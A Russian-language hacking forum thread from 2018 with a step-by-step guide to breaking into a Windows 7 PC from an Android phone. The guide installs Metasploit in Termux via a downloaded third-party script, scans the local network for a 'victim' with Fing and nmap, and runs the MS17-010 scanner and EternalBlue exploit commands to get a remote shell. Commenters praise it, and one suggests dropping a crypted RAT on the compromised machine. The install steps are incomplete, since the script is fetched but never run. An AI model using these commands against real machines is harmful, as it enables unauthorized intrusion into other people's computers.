Загрузка...

Лёгкий взлом компа с андроида.

Тема в разделе Kali Linux создана пользователем sotru 11 май 2018. 8935 просмотров

Загрузка...
  1. sotru
    sotru Автор темы 11 май 2018 мы многих ограбили, чтобы попить чая с ништяками 436 24 ноя 2017
    Всё что нам для этого понадобится:

    • Прямые руки
    • Телефон на андроиде
    • Fing
    • nmap
    • temux и metasploit или kali nethunter
    1)
    Для начала скачаем termux из google play
    Теперь установим metasploit:

    Код:
    apt update
    Код:
    apt upgrade
    Код:
    apt install curl
    Код:
    curl -LO https://raw.githubusercontent.com/1Tech-X/Metasploit-/master/metasploit.sh
    Код:
    cd metasploit-framework-4.14.28
    Код:
    ./msfconsole
    Знаю загрузка довольно долгая но нужно потерпеть сожми яйца в кулак и жди

    После всего у нас должен открыться metasploit

    [IMG]

    осле того как вы установили metasploit можете считать что вы Zупер хакер и спокойно идти грабить банк или на урок информатики к Марине Сергеевне.

    2)
    Сканирование сети c Fing
    Теперь посмотрим кто есть в нашей сети:
    Для этого удобно использовать утилиту Fing
    Вот так выглядит моя локальная сеть(у всех по разному):

    [IMG]

    И если у вас зрение не минус 40 то можно легко увидеть "USER-ПК"(у всех всё по разному) он и будет нашей жертвой.Выбираем и запоминаем ip нашей жертвы,в моём случае это 192.168.1.104 и сканим его на порты.

    3)
    Сканирование на открытые порты c nmap
    Установим этот чудесный инструмент:
    Код:
    apt-get update
    Код:
    apt-get install nmap
    ip нашей жертвы,в моём случае это 192.168.1.104, сканим его на порты
    Код:
    nmap ip жертвы
    В моём случае это:
    nmap 192.168.1.104
    Есть бесконечное множество настроек nmap но в данный момент подойдёт эта(из за скорости)
    Вот что мы видим:

    [IMG]

    У меня стоит на машине 7 винда и у неё открыт 445 порт,любому более менее шарящему в metasploit человеку сразу понятно что первым делом мы будем юзать эксплоит eternalblue.

    4)
    Проверка уязвимости
    Дальше пойдут скрины с консоли kali nethunter так что не пугайтесь,все команды идентичны с командами в termux.(Мне так просто реально удобнее)
    Для начала мы протестим на сканере возьмёт ли наш эксплоит нашу жертву
    в metasploit вводите:
    Код:
    use auxiliary/scanner/smb/smb_ms17_010
    Здесь нам нужно указать только ip адрес жертвы
    Код:
    Выглядит это так:
    set RHOSTS ip жертвы
    В моём случае это:
    set RHOSTS 192.168.1.104
    Запускаем **** командой
    Код:
    run

    [IMG]

    Если мы видим что-то подобное значит хост уязвим к эксплоиту

    5)
    Теперь завершающая стадия:использование эксплоита
    В том же metasploit пишем
    Код:
    use exploit/windows/smb/ms17_010_eternalblue
    Здесь нам нужно указать ip жертвы и процесс
    Ip жертвы:
    Код:
    Выглядит это так:
    set RHOST ip жертвы
    В моём случае это:
    set RHOST 192.168.1.104
    И процесс
    Код:
    set ProcessName explorer.exe

    [IMG]

    И после того как вы помолились и поставили икону на обои можно запускать эксплоит
    Код:
    exploit
    Если всё удачно то тогда мы получим полный доступ к командной строке атакуемого компухтера.

    [IMG]

    [IMG]

    [IMG]

    Всем спасибо за внимание!
     
    11 май 2018 Изменено
  2. Methane
    Methane 11 май 2018 Заблокирован(а) 581 18 янв 2018
    Годно
     
  3. Senfine
    Senfine 11 май 2018 Заблокирован(а) 148 30 июл 2016
    Есть чо для iOS? Я знаю что metasploid есть для iOS, но он сука через терминал у меня криво ставится и в итоге не запускается(
     
  4. EVILOFF
    EVILOFF 11 май 2018 /// 282 17 окт 2017
    Думал очередной гайд для тру хацкеров , а тут все понятно объяснили , можно будет найти применение на практике :thinking:
     
  5. heroverin
    heroverin 11 май 2018 *autistic screaming* 47 16 дек 2017
    Последним временем замечаю, что норм хацкеры с xiaomi дело имеют. А за статью - молодец.
     
  6. Dooda
    Dooda 11 май 2018 31 13 май 2017
    Пожалуй самая годная и разжеванная статья про термукс)
     
  7. medardio
    medardio 12 май 2018 Заблокирован(а) 57 29 ноя 2016
    cd metasploit-framework пишет no such file or directory
     
  8. medardio
    medardio 13 май 2018 Заблокирован(а) 57 29 ноя 2016
    все,понял,теперь аж стыдно
     
  9. Andrey1206
    Andrey1206 13 май 2018 Заблокирован(а) 12 12 май 2018
    Годнота
     
  10. DimkaBear
    DimkaBear 13 май 2018 26 7 фев 2018
    А потом за решётку :prison:
     
  11. 13Snickersik37
    13Snickersik37 13 май 2018 Заблокирован(а) 252 29 апр 2017
    Годно, симпу влепил
     
  12. Киберполиция
    А в чем причина? Я чет не понял:thinking:
     
  13. rscx
    rscx 13 май 2018 2136 17 фев 2018
    /del
    Уже тысячная тема по этому говну
     
  14. 13Snickersik37
    13Snickersik37 13 май 2018 Заблокирован(а) 252 29 апр 2017
    Симпу убрал)
     
  15. sotru
    sotru Автор темы 13 май 2018 мы многих ограбили, чтобы попить чая с ништяками 436 24 ноя 2017
    И что ? Может у кого-то какой-то способ не работает, выкладываю ещё 1. В точь-точь такой темы нету чё ты доебался.
     
  16. rscx
    rscx 13 май 2018 2136 17 фев 2018
    ору
    /del
     
  17. Dooda
    Dooda 13 май 2018 31 13 май 2017
    Это консоль,и тут стрима не подрубить,можно по идее сделать скрин с вебки,либо же просто уже имея доступ к компу,закинуть туда криптованный ратник и иметь уже нормальный доступ ко всему. Но все это конечно надо суметь провернуть))
     
  18. ThomasShelBY
    ThomasShelBY 13 май 2018 Заблокирован(а) 187 19 мар 2017
    Код:
    cd metasploit-framework-4.14.28

    Не может найти директорию или файл после прописания команды
     
  19. Sfoxx
    Sfoxx 15 май 2018 0 18 апр 2018
    годно, автор - круасанчик
     
  20. imbalance_inactive
    imbalance_inactive 15 май 2018 Заблокирован(а) 0 9 май 2018
    Так-же
     
Top